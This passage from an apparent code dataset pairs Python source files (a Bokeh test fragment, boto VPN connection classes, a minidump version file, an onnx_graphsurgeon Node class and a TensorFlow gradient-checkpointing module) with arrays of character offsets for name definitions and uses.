c2 = p2.properties_with_values(include_defaults=False)
assert c1 == c2
def test_Alias() -> None:
class Foo(HasProps):
x = Int(12)
ax = Alias('x')
f = Foo(x=10)
assert f.x == 10
assert f.ax == 10
f.x = 20
assert f.x == 20
assert f.ax == 20
f.ax = 30
assert f.x == 30
assert f.ax == 30
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcp, ALL)
| [
[
[
527,
538
]
],
[
[
560,
566
],
[
569,
575
],
[
4426,
4432
],
[
4547,
4553
],
[
5320,
5326
],
[
9248,
9254
],
[
9310,
9316
]
],
[
[
772,
783
],
[
3099,
3101
],
[
3114,
3116
]
],
[
[
837,
847
],
[
14748,
14758
]
],
[
[
881,
889
],
[
13120,
13128
],
[
13151,
13159
],
[
13182,
13190
],
[
2832,
2840
],
[
4127,
4135
],
[
4661,
4669
],
[
4957,
4965
],
[
5453,
5461
],
[
5556,
5564
],
[
5587,
5595
],
[
5708,
5716
],
[
5855,
5863
],
[
6637,
6645
],
[
6741,
6749
],
[
7175,
7183
],
[
8351,
8359
],
[
9540,
9548
],
[
10409,
10417
],
[
10971,
10979
],
[
11801,
11809
],
[
13253,
13261
],
[
13367,
13375
],
[
13992,
14000
]
],
[
[
930,
935
],
[
14036,
14041
]
],
[
[
941,
945
],
[
2953,
2957
]
],
[
[
951,
955
],
[
4154,
4158
],
[
4235,
4239
],
[
5008,
5012
]
],
[
[
961,
966
],
[
4772,
4777
],
[
6710,
6715
]
],
[
[
972,
980
],
[
5547,
5555
],
[
5699,
5707
],
[
5846,
5854
]
],
[
[
986,
989
],
[
2859,
2862
],
[
2920,
2923
],
[
2966,
2969
],
[
4688,
4691
],
[
4984,
4987
],
[
5482,
5485
],
[
5622,
5625
],
[
5773,
5776
],
[
7202,
7205
],
[
8378,
8381
],
[
8444,
8447
],
[
9567,
9570
],
[
10436,
10439
],
[
10998,
11001
],
[
11828,
11831
],
[
13276,
13279
],
[
13329,
13332
],
[
13390,
13393
],
[
13443,
13446
],
[
14015,
14018
]
],
[
[
995,
999
],
[
2915,
2919
],
[
5514,
5518
],
[
5660,
5664
],
[
5809,
5813
],
[
13324,
13328
],
[
13438,
13442
]
],
[
[
1005,
1013
],
[
2987,
2995
],
[
8435,
8443
]
],
[
[
1019,
1029
],
[
6666,
6676
],
[
6776,
6786
],
[
6846,
6856
]
],
[
[
1035,
1043
],
[
11884,
11892
],
[
12007,
12015
]
],
[
[
1049,
1055
],
[
2883,
2889
],
[
2958,
2964
],
[
2996,
3002
],
[
4712,
4718
],
[
5053,
5059
],
[
5519,
5525
],
[
5665,
5671
],
[
5814,
5820
],
[
7244,
7250
],
[
8507,
8513
],
[
9591,
9597
],
[
10460,
10466
],
[
11022,
11028
],
[
13296,
13302
],
[
13410,
13416
]
],
[
[
1084,
1088
],
[
13775,
13779
]
],
[
[
1117,
1145
],
[
14759,
14762
]
],
[
[
1327,
1330
],
[
14764,
14767
]
],
[
[
2762,
2771
]
],
[
[
13116,
13119
]
],
[
[
13147,
13150
]
],
[
[
13178,
13181
]
],
[
[
13207,
13227
]
],
[
[
13735,
13754
]
],
[
[
13956,
13966
]
],
[
[
14733,
14745
]
]
] |
# Copyright (c) 2009-2010 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto
from datetime import datetime
from boto.resultset import ResultSet
"""
Represents a VPN Connection
"""
from boto.ec2.ec2object import TaggedEC2Object
class VpnConnectionOptions(object):
"""
Represents VPN connection options
:ivar static_routes_only: Indicates whether the VPN connection uses static
routes only. Static routes must be used for devices that don't support
BGP.
"""
def __init__(self, static_routes_only=None, tunnel_options=None):
self.static_routes_only = static_routes_only
self.tunnel_options = tunnel_options
def __repr__(self):
return 'VpnConnectionOptions'
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'staticRoutesOnly':
self.static_routes_only = True if value == 'true' else False
elif name == 'tunnelOptions':
self.tunnel_options = value
else:
setattr(self, name, value)
class VpnStaticRoute(object):
"""
Represents a static route for a VPN connection.
:ivar destination_cidr_block: The CIDR block associated with the local
subnet of the customer data center.
:ivar source: Indicates how the routes were provided.
:ivar state: The current state of the static route.
"""
def __init__(self, destination_cidr_block=None, source=None, state=None):
self.destination_cidr_block = destination_cidr_block
self.source = source
        self.state = state
def __repr__(self):
return 'VpnStaticRoute: %s' % self.destination_cidr_block
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'destinationCidrBlock':
self.destination_cidr_block = value
elif name == 'source':
self.source = value
elif name == 'state':
self.state = value
else:
setattr(self, name, value)
class VpnTunnel(object):
"""
Represents telemetry for a VPN tunnel
:ivar outside_ip_address: The Internet-routable IP address of the
virtual private gateway's outside interface.
:ivar status: The status of the VPN tunnel. Valid values: UP | DOWN
:ivar last_status_change: The date and time of the last change in status.
:ivar status_message: If an error occurs, a description of the error.
:ivar accepted_route_count: The number of accepted routes.
"""
def __init__(self, outside_ip_address=None, status=None, last_status_change=None,
status_message=None, accepted_route_count=None):
self.outside_ip_address = outside_ip_address
self.status = status
self.last_status_change = last_status_change
self.status_message = status_message
self.accepted_route_count = accepted_route_count
def __repr__(self):
return 'VpnTunnel: %s' % self.outside_ip_address
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'outsideIpAddress':
self.outside_ip_address = value
elif name == 'status':
self.status = value
elif name == 'lastStatusChange':
self.last_status_change = datetime.strptime(value,
'%Y-%m-%dT%H:%M:%S.%fZ')
elif name == 'statusMessage':
self.status_message = value
elif name == 'acceptedRouteCount':
try:
value = int(value)
except ValueError:
boto.log.warning('Error converting code (%s) to int' % value)
self.accepted_route_count = value
else:
setattr(self, name, value)
class VpnConnection(TaggedEC2Object):
"""
Represents a VPN Connection
:ivar id: The ID of the VPN connection.
:ivar state: The current state of the VPN connection.
Valid values: pending | available | deleting | deleted
:ivar customer_gateway_configuration: The configuration information for the
VPN connection's customer gateway (in the native XML format). This
element is always present in the
:class:`boto.vpc.VPCConnection.create_vpn_connection` response;
however, it's present in the
:class:`boto.vpc.VPCConnection.get_all_vpn_connections` response only
if the VPN connection is in the pending or available state.
:ivar type: The type of VPN connection (ipsec.1).
:ivar customer_gateway_id: The ID of the customer gateway at your end of
the VPN connection.
:ivar vpn_gateway_id: The ID of the virtual private gateway
at the AWS side of the VPN connection.
:ivar tunnels: A list of the vpn tunnels (always 2)
:ivar options: The option set describing the VPN connection.
:ivar static_routes: A list of static routes associated with a VPN
connection.
"""
def __init__(self, connection=None):
super(VpnConnection, self).__init__(connection)
self.id = None
self.state = None
self.customer_gateway_configuration = None
self.type = None
self.customer_gateway_id = None
self.vpn_gateway_id = None
self.tunnels = []
self.options = None
self.static_routes = []
def __repr__(self):
return 'VpnConnection:%s' % self.id
def startElement(self, name, attrs, connection):
retval = super(VpnConnection, self).startElement(name, attrs, connection)
if retval is not None:
return retval
if name == 'vgwTelemetry':
self.tunnels = ResultSet([('item', VpnTunnel)])
return self.tunnels
elif name == 'routes':
self.static_routes = ResultSet([('item', VpnStaticRoute)])
return self.static_routes
elif name == 'options':
self.options = VpnConnectionOptions()
return self.options
return None
def endElement(self, name, value, connection):
if name == 'vpnConnectionId':
self.id = value
elif name == 'state':
self.state = value
elif name == 'customerGatewayConfiguration':
self.customer_gateway_configuration = value
elif name == 'type':
self.type = value
elif name == 'customerGatewayId':
self.customer_gateway_id = value
elif name == 'vpnGatewayId':
self.vpn_gateway_id = value
else:
setattr(self, name, value)
def delete(self, dry_run=False):
return self.connection.delete_vpn_connection(
self.id,
dry_run=dry_run
)
| [
[
[
1110,
1114
],
[
4757,
4761
]
],
[
[
1136,
1144
],
[
4447,
4455
]
],
[
[
1172,
1181
],
[
6812,
6821
],
[
6941,
6950
]
],
[
[
1252,
1267
],
[
4939,
4954
]
],
[
[
1275,
1295
],
[
7076,
7096
]
],
[
[
2133,
2147
],
[
6961,
6975
]
],
[
[
3143,
3152
],
[
6832,
6841
]
],
[
[
4925,
4938
],
[
6160,
6173
],
[
6634,
6647
]
]
] |
__version__ = "0.0.18"
__banner__ = \
"""
# minidump %s
# Author: Tamas Jos @skelsec (skelsecprojects@gmail.com)
""" % __version__ | [
[
[
1,
12
],
[
121,
132
]
],
[
[
24,
34
]
]
] |
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from onnx_graphsurgeon.logger.logger import G_LOGGER
from onnx_graphsurgeon.ir.tensor import Tensor
from onnx_graphsurgeon.util import misc
from collections import OrderedDict
from typing import List, Dict
class Node(object):
def __init__(
self,
op: str,
name: str = None,
attrs: Dict[str, object] = None,
inputs: List["Tensor"] = None,
outputs: List["Tensor"] = None,
):
"""
A node represents an operation in a graph, and consumes zero or more Tensors, and produces zero or more Tensors.
Args:
op (str): The operation this node performs.
name (str): The name of this node.
attrs (Dict[str, object]): A dictionary that maps attribute names to their values.
inputs (List[Tensor]): A list of zero or more input Tensors.
outputs (List[Tensor]): A list of zero or more output Tensors.
"""
self.op = op
self.name = misc.default_value(name, "")
self.attrs = misc.default_value(attrs, OrderedDict())
self.inputs = misc.SynchronizedList(self, field_name="outputs", initial=misc.default_value(inputs, []))
self.outputs = misc.SynchronizedList(self, field_name="inputs", initial=misc.default_value(outputs, []))
def i(self, tensor_idx=0, producer_idx=0):
"""
Convenience function to get a producer node of one of this node's input tensors.
Note that the parameters are swapped compared to the o() function; this is because tensors are likely to have only a single producer
For example:
::
assert node.i() == node.inputs[0].inputs[0]
assert node.i(1, 2) == node.inputs[1].inputs[2]
Args:
tensor_idx (int): The index of the input tensor of this node. Defaults to 0.
producer_idx (int): The index of the producer of the input tensor, if the tensor has multiple producers. Defaults to 0
Returns:
Node: The specified producer (input) node.
"""
return self.inputs[tensor_idx].inputs[producer_idx]
def o(self, consumer_idx=0, tensor_idx=0):
"""
Convenience function to get a consumer node of one of this node's output tensors.
For example:
::
assert node.o() == node.outputs[0].outputs[0]
assert node.o(2, 1) == node.outputs[1].outputs[2]
Args:
consumer_idx (int): The index of the consumer of the input tensor. Defaults to 0.
tensor_idx (int): The index of the output tensor of this node, if the node has multiple outputs. Defaults to 0.
Returns:
Node: The specified consumer (output) node
"""
return self.outputs[tensor_idx].outputs[consumer_idx]
def __setattr__(self, name, value):
if name in ["inputs", "outputs"]:
try:
getattr(self, name).clear()
getattr(self, name).extend(value)
except AttributeError:
super().__setattr__(name, value)
else:
super().__setattr__(name, value)
def copy(self, inputs: List["Tensor"] = None, outputs: List["Tensor"] = None, tensor_map=None):
"""
Makes a shallow copy of this node, overriding input and output information.
Note: Generally, you should only ever make a copy of a Graph.
"""
from onnx_graphsurgeon.ir.graph import Graph
new_attrs = OrderedDict()
for name, attr in self.attrs.items():
if isinstance(attr, Graph):
new_attrs[name] = attr.copy(tensor_map)
else:
new_attrs[name] = attr
return Node(self.op, self.name, new_attrs, inputs=inputs, outputs=outputs)
def __str__(self):
ret = "{:} ({:})".format(self.name, self.op)
def add_io(name, io):
nonlocal ret
ret += "\n\t{:}: [".format(name)
for elem in io:
ret += "\n\t\t{:}".format(elem)
ret += "\n\t]"
add_io("Inputs", self.inputs)
add_io("Outputs", self.outputs)
if self.attrs:
ret += "\nAttributes: {:}".format(self.attrs)
return ret
def __repr__(self):
return self.__str__()
def __eq__(self, other):
"""
Check whether two nodes are equal by comparing name, attributes, op, inputs, and outputs.
"""
G_LOGGER.verbose("Comparing node: {:} with {:}".format(self.name, other.name))
attrs_match = self.name == other.name and self.op == other.op and self.attrs == other.attrs
inputs_match = len(self.inputs) == len(other.inputs) and all(
[inp == other_inp for inp, other_inp in zip(self.inputs, other.inputs)]
)
outputs_match = len(self.outputs) == len(other.outputs) and all(
[out == other_out for out, other_out in zip(self.outputs, other.outputs)]
)
return attrs_match and inputs_match and outputs_match
| [
[
[
733,
741
],
[
5152,
5160
]
],
[
[
782,
788
]
],
[
[
824,
828
],
[
1668,
1672
],
[
1718,
1722
],
[
1781,
1785
],
[
1839,
1843
],
[
1894,
1898
],
[
1951,
1955
]
],
[
[
854,
865
],
[
1744,
1755
],
[
4179,
4190
]
],
[
[
885,
889
],
[
1050,
1054
],
[
1090,
1094
],
[
3853,
3857
],
[
3885,
3889
]
],
[
[
891,
895
],
[
1008,
1012
]
],
[
[
904,
908
],
[
4408,
4412
]
]
] |
from toposort import toposort
import contextlib
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
import time
import sys
sys.setrecursionlimit(10000)
# refers back to current module if we decide to split helpers out
util = sys.modules[__name__]
# getting rid of "WARNING:tensorflow:VARIABLES collection name is deprecated"
setattr(tf.GraphKeys, "VARIABLES", "variables")
# save original gradients since tf.gradient could be monkey-patched to point
# to our version
from tensorflow.python.ops import gradients as tf_gradients_lib
tf_gradients = tf_gradients_lib.gradients
MIN_CHECKPOINT_NODE_SIZE=1024 # use lower value during testing
# specific versions we can use to do process-wide replacement of tf.gradients
def gradients_speed(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='speed', **kwargs)
def gradients_memory(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='memory', **kwargs)
def gradients_collection(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='collection', **kwargs)
def gradients(ys, xs, grad_ys=None, checkpoints='collection', **kwargs):
'''
Authors: Tim Salimans & Yaroslav Bulatov
memory efficient gradient implementation inspired by "Training Deep Nets with Sublinear Memory Cost"
by Chen et al. 2016 (https://arxiv.org/abs/1604.06174)
ys,xs,grad_ys,kwargs are the arguments to standard tensorflow tf.gradients
(https://www.tensorflow.org/versions/r0.12/api_docs/python/train.html#gradients)
'checkpoints' can either be
- a list consisting of tensors from the forward pass of the neural net
that we should re-use when calculating the gradients in the backward pass
all other tensors that do not appear in this list will be re-computed
- a string specifying how this list should be determined. currently we support
- 'speed': checkpoint all outputs of convolutions and matmuls. these ops are usually the most expensive,
so checkpointing them maximizes the running speed
(this is a good option if nonlinearities, concats, batchnorms, etc are taking up a lot of memory)
- 'memory': try to minimize the memory usage
(currently using a very simple strategy that identifies a number of bottleneck tensors in the graph to checkpoint)
- 'collection': look for a tensorflow collection named 'checkpoints', which holds the tensors to checkpoint
'''
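    # Usage sketch (an assumption, not part of the original source): import this module,
    # e.g. as ``memory_saving_gradients``, and rebind ``tf.gradients`` to one of the
    # wrappers above (gradients_speed / gradients_memory / gradients_collection) so that
    # existing training code transparently picks up the checkpointed implementation.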
# print("Calling memsaving gradients with", checkpoints)
if not isinstance(ys,list):
ys = [ys]
if not isinstance(xs,list):
xs = [xs]
bwd_ops = ge.get_backward_walk_ops([y.op for y in ys],
inclusive=True)
debug_print("bwd_ops: %s", bwd_ops)
# forward ops are all ops that are candidates for recomputation
fwd_ops = ge.get_forward_walk_ops([x.op for x in xs],
inclusive=True,
within_ops=bwd_ops)
debug_print("fwd_ops: %s", fwd_ops)
# exclude ops with no inputs
fwd_ops = [op for op in fwd_ops if op.inputs]
# don't recompute xs, remove variables
xs_ops = _to_ops(xs)
fwd_ops = [op for op in fwd_ops if not op in xs_ops]
fwd_ops = [op for op in fwd_ops if not '/assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/Assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/read' in op.name]
ts_all = ge.filter_ts(fwd_ops, True) # get the tensors
ts_all = [t for t in ts_all if '/read' not in t.name]
ts_all = set(ts_all) - set(xs) - set(ys)
# construct list of tensors to checkpoint during forward pass, if not
# given as input
if type(checkpoints) is not list:
if checkpoints == 'collection':
checkpoints = tf.get_collection('checkpoints')
elif checkpoints == 'speed':
# checkpoint all expensive ops to maximize running speed
checkpoints = ge.filter_ts_from_regex(fwd_ops, 'conv2d|Conv|MatMul')
elif checkpoints == 'memory':
# remove very small tensors and some weird ops
def fixdims(t): # tf.Dimension values are not compatible with int, convert manually
try:
return [int(e if e.value is not None else 64) for e in t]
except:
return [0] # unknown shape
ts_all = [t for t in ts_all if np.prod(fixdims(t.shape)) > MIN_CHECKPOINT_NODE_SIZE]
ts_all = [t for t in ts_all if 'L2Loss' not in t.name]
ts_all = [t for t in ts_all if 'entropy' not in t.name]
ts_all = [t for t in ts_all if 'FusedBatchNorm' not in t.name]
ts_all = [t for t in ts_all if 'Switch' not in t.name]
ts_all = [t for t in ts_all if 'dropout' not in t.name]
# DV: FP16_FIX - need to add 'Cast' layer here to make it work for FP16
ts_all = [t for t in ts_all if 'Cast' not in t.name]
# filter out all tensors that are inputs of the backward graph
with util.capture_ops() as bwd_ops:
tf_gradients(ys, xs, grad_ys, **kwargs)
bwd_inputs = [t for op in bwd_ops for t in op.inputs]
# list of tensors in forward graph that is in input to bwd graph
ts_filtered = list(set(bwd_inputs).intersection(ts_all))
debug_print("Using tensors %s", ts_filtered)
# try two slightly different ways of getting bottlenecks tensors
# to checkpoint
for ts in [ts_filtered, ts_all]:
# get all bottlenecks in the graph
bottleneck_ts = []
for t in ts:
b = set(ge.get_backward_walk_ops(t.op, inclusive=True, within_ops=fwd_ops))
f = set(ge.get_forward_walk_ops(t.op, inclusive=False, within_ops=fwd_ops))
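            # b = ops that produce t (its backward cone), f = ops strictly
            # downstream of t (its forward cone), both restricted to fwd_ops.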
            # check that there are no shortcuts around t
b_inp = set([inp for op in b for inp in op.inputs]).intersection(ts_all)
f_inp = set([inp for op in f for inp in op.inputs]).intersection(ts_all)
if not set(b_inp).intersection(f_inp) and len(b_inp)+len(f_inp) >= len(ts_all):
bottleneck_ts.append(t) # we have a bottleneck!
else:
debug_print("Rejected bottleneck candidate and ops %s", [t] + list(set(ts_all) - set(b_inp) - set(f_inp)))
# success? or try again without filtering?
if len(bottleneck_ts) >= np.sqrt(len(ts_filtered)): # yes, enough bottlenecks found!
break
if not bottleneck_ts:
raise Exception('unable to find bottleneck tensors! please provide checkpoint nodes manually, or use checkpoints="speed".')
# sort the bottlenecks
bottlenecks_sorted_lists = tf_toposort(bottleneck_ts, within_ops=fwd_ops)
sorted_bottlenecks = [t for ts in bottlenecks_sorted_lists for t in ts]
# save an approximately optimal number ~ sqrt(N)
N = len(ts_filtered)
if len(bottleneck_ts) <= np.ceil(np.sqrt(N)):
checkpoints = sorted_bottlenecks
else:
step = int(np.ceil(len(bottleneck_ts) / np.sqrt(N)))
checkpoints = sorted_bottlenecks[step::step]
else:
raise Exception('%s is unsupported input for "checkpoints"' % (checkpoints,))
checkpoints = list(set(checkpoints).intersection(ts_all))
# at this point automatic selection happened and checkpoints is list of nodes
assert isinstance(checkpoints, list)
debug_print("Checkpoint nodes used: %s", checkpoints)
# better error handling of special cases
# xs are already handled as checkpoint nodes, so no need to include them
xs_intersect_checkpoints = set(xs).intersection(set(checkpoints))
if xs_intersect_checkpoints:
debug_print("Warning, some input nodes are also checkpoint nodes: %s",
xs_intersect_checkpoints)
ys_intersect_checkpoints = set(ys).intersection(set(checkpoints))
debug_print("ys: %s, checkpoints: %s, intersect: %s", ys, checkpoints,
ys_intersect_checkpoints)
# saving an output node (ys) gives no benefit in memory while creating
# new edge cases, exclude them
if ys_intersect_checkpoints:
debug_print("Warning, some output nodes are also checkpoints nodes: %s",
format_ops(ys_intersect_checkpoints))
# remove initial and terminal nodes from checkpoints list if present
checkpoints = list(set(checkpoints) - set(ys) - set(xs))
# check that we have some nodes to checkpoint
if not checkpoints:
raise Exception('no checkpoints nodes found or given as input! ')
# disconnect dependencies between checkpointed tensors
checkpoints_disconnected = {}
for x in checkpoints:
if x.op and x.op.name is not None:
grad_node = tf.stop_gradient(x, name=x.op.name+"_sg")
else:
grad_node = tf.stop_gradient(x)
checkpoints_disconnected[x] = grad_node
# partial derivatives to the checkpointed tensors and xs
ops_to_copy = fast_backward_ops(seed_ops=[y.op for y in ys],
stop_at_ts=checkpoints, within_ops=fwd_ops)
debug_print("Found %s ops to copy within fwd_ops %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ys], checkpoints)
debug_print("ops_to_copy = %s", ops_to_copy)
debug_print("Processing list %s", ys)
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected.values(), checkpoints_disconnected.keys(), can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected.values(), checkpoints_disconnected.keys(), copied_ops)
# get gradients with respect to current boundary + original x's
copied_ys = [info._transformed_ops[y.op]._outputs[0] for y in ys]
boundary = list(checkpoints_disconnected.values())
dv = tf_gradients(ys=copied_ys, xs=boundary+xs, grad_ys=grad_ys, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", copied_ys)
debug_print("with respect to %s", boundary+xs)
inputs_to_do_before = [y.op for y in ys]
if grad_ys is not None:
inputs_to_do_before += grad_ys
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
# dictionary of "node: backprop" for nodes in the boundary
d_checkpoints = {r: dr for r,dr in zip(checkpoints_disconnected.keys(),
dv[:len(checkpoints_disconnected)])}
# partial derivatives to xs (usually the params of the neural net)
d_xs = dv[len(checkpoints_disconnected):]
# incorporate derivatives flowing through the checkpointed nodes
checkpoints_sorted_lists = tf_toposort(checkpoints, within_ops=fwd_ops)
for ts in checkpoints_sorted_lists[::-1]:
debug_print("Processing list %s", ts)
checkpoints_other = [r for r in checkpoints if r not in ts]
checkpoints_disconnected_other = [checkpoints_disconnected[r] for r in checkpoints_other]
# copy part of the graph below current checkpoint node, stopping at
# other checkpoints nodes
ops_to_copy = fast_backward_ops(within_ops=fwd_ops, seed_ops=[r.op for r in ts], stop_at_ts=checkpoints_other)
debug_print("Found %s ops to copy within %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ts],
checkpoints_other)
debug_print("ops_to_copy = %s", ops_to_copy)
if not ops_to_copy: # we're done!
break
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected_other, checkpoints_other, can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected_other, checkpoints_other, copied_ops)
# gradient flowing through the checkpointed node
boundary = [info._transformed_ops[r.op]._outputs[0] for r in ts]
substitute_backprops = [d_checkpoints[r] for r in ts]
dv = tf_gradients(boundary,
checkpoints_disconnected_other+xs,
grad_ys=substitute_backprops, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", boundary)
debug_print("with respect to %s", checkpoints_disconnected_other+xs)
debug_print("with boundary backprop substitutions %s", substitute_backprops)
inputs_to_do_before = [d_checkpoints[r].op for r in ts]
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
for r, dr in zip(checkpoints_other, dv[:len(checkpoints_other)]):
if dr is not None:
if d_checkpoints[r] is None:
d_checkpoints[r] = dr
else:
d_checkpoints[r] += dr
def _unsparsify(x):
if not isinstance(x, tf.IndexedSlices):
return x
assert x.dense_shape is not None, "memory_saving_gradients encountered sparse gradients of unknown shape"
indices = x.indices
while indices.shape.ndims < x.values.shape.ndims:
indices = tf.expand_dims(indices, -1)
return tf.scatter_nd(indices, x.values, x.dense_shape)
# partial derivatives to xs (usually the params of the neural net)
d_xs_new = dv[len(checkpoints_other):]
for j in range(len(xs)):
if d_xs_new[j] is not None:
if d_xs[j] is None:
d_xs[j] = _unsparsify(d_xs_new[j])
else:
d_xs[j] += _unsparsify(d_xs_new[j])
return d_xs
def tf_toposort(ts, within_ops=None):
all_ops = ge.get_forward_walk_ops([x.op for x in ts], within_ops=within_ops)
deps = {}
for op in all_ops:
for o in op.outputs:
deps[o] = set(op.inputs)
sorted_ts = toposort(deps)
# only keep the tensors from our original list
ts_sorted_lists = []
for l in sorted_ts:
keep = list(set(l).intersection(ts))
if keep:
ts_sorted_lists.append(keep)
return ts_sorted_lists
def fast_backward_ops(within_ops, seed_ops, stop_at_ts):
bwd_ops = set(ge.get_backward_walk_ops(seed_ops, stop_at_ts=stop_at_ts))
ops = bwd_ops.intersection(within_ops).difference([t.op for t in stop_at_ts])
return list(ops)
@contextlib.contextmanager
def capture_ops():
"""Decorator to capture ops created in the block.
with capture_ops() as ops:
# create some ops
print(ops) # => prints ops created.
"""
micros = int(time.time()*10**6)
scope_name = str(micros)
op_list = []
with tf.name_scope(scope_name):
yield op_list
g = tf.get_default_graph()
op_list.extend(ge.select_ops(scope_name+"/.*", graph=g))
def _to_op(tensor_or_op):
if hasattr(tensor_or_op, "op"):
return tensor_or_op.op
return tensor_or_op
def _to_ops(iterable):
if not _is_iterable(iterable):
return iterable
return [_to_op(i) for i in iterable]
def _is_iterable(o):
try:
_ = iter(o)
except Exception:
return False
return True
DEBUG_LOGGING = False
def debug_print(s, *args):
"""Like logger.log, but also replaces all TensorFlow ops/tensors with their
names. Sensitive to value of DEBUG_LOGGING, see enable_debug/disable_debug
Usage:
debug_print("see tensors %s for %s", tensorlist, [1,2,3])
"""
if DEBUG_LOGGING:
formatted_args = [format_ops(arg) for arg in args]
print("DEBUG "+s % tuple(formatted_args))
def format_ops(ops, sort_outputs=True):
"""Helper method for printing ops. Converts Tensor/Operation op to op.name,
rest to str(op)."""
if hasattr(ops, '__iter__') and not isinstance(ops, str):
l = [(op.name if hasattr(op, "name") else str(op)) for op in ops]
if sort_outputs:
return sorted(l)
return l
else:
return ops.name if hasattr(ops, "name") else str(ops)
def my_add_control_inputs(wait_to_do_ops, inputs_to_do_before):
for op in wait_to_do_ops:
ci = [i for i in inputs_to_do_before if op.control_inputs is None or i not in op.control_inputs]
ge.add_control_inputs(op, ci)
| [
[
[
21,
29
],
[
15110,
15118
]
],
[
[
37,
47
],
[
15597,
15607
]
],
[
[
55,
66
],
[
4630,
4632
],
[
6761,
6763
],
[
7360,
7362
],
[
7368,
7370
],
[
7475,
7477
],
[
7504,
7506
]
],
[
[
74,
90
],
[
370,
372
],
[
3976,
3978
],
[
9229,
9231
],
[
9309,
9311
],
[
15873,
15875
],
[
15925,
15927
],
[
14110,
14112
],
[
14392,
14394
],
[
14439,
14441
]
],
[
[
98,
135
],
[
2783,
2785
],
[
3011,
3013
],
[
3627,
3629
],
[
4154,
4156
],
[
5923,
5925
],
[
6019,
6021
],
[
9857,
9859
],
[
9889,
9891
],
[
10132,
10134
],
[
12389,
12391
],
[
12421,
12423
],
[
12684,
12686
],
[
14923,
14925
],
[
15433,
15435
],
[
15965,
15967
],
[
17339,
17341
]
],
[
[
143,
147
],
[
15805,
15809
]
],
[
[
155,
158
],
[
159,
162
],
[
261,
264
]
],
[
[
254,
258
],
[
5271,
5275
]
],
[
[
539,
568
],
[
584,
600
]
],
[
[
569,
581
],
[
5318,
5330
],
[
10598,
10610
],
[
13127,
13139
]
],
[
[
612,
636
],
[
4658,
4682
]
],
[
[
761,
776
]
],
[
[
884,
900
]
],
[
[
1017,
1037
]
],
[
[
1150,
1159
],
[
821,
830
],
[
945,
954
],
[
1082,
1091
]
],
[
[
14875,
14886
],
[
7097,
7108
],
[
11535,
11546
]
],
[
[
15362,
15379
],
[
9457,
9474
],
[
11971,
11988
]
],
[
[
15627,
15638
]
],
[
[
16012,
16018
],
[
16204,
16210
]
],
[
[
16122,
16129
],
[
3352,
3359
]
],
[
[
16238,
16250
],
[
16150,
16162
]
],
[
[
16330,
16343
],
[
16616,
16629
]
],
[
[
16354,
16365
],
[
2888,
2899
],
[
3171,
3182
],
[
5583,
5594
],
[
6553,
6564
],
[
7887,
7898
],
[
8174,
8185
],
[
8365,
8376
],
[
8629,
8640
],
[
9588,
9599
],
[
9747,
9758
],
[
9796,
9807
],
[
10072,
10083
],
[
10241,
10252
],
[
10672,
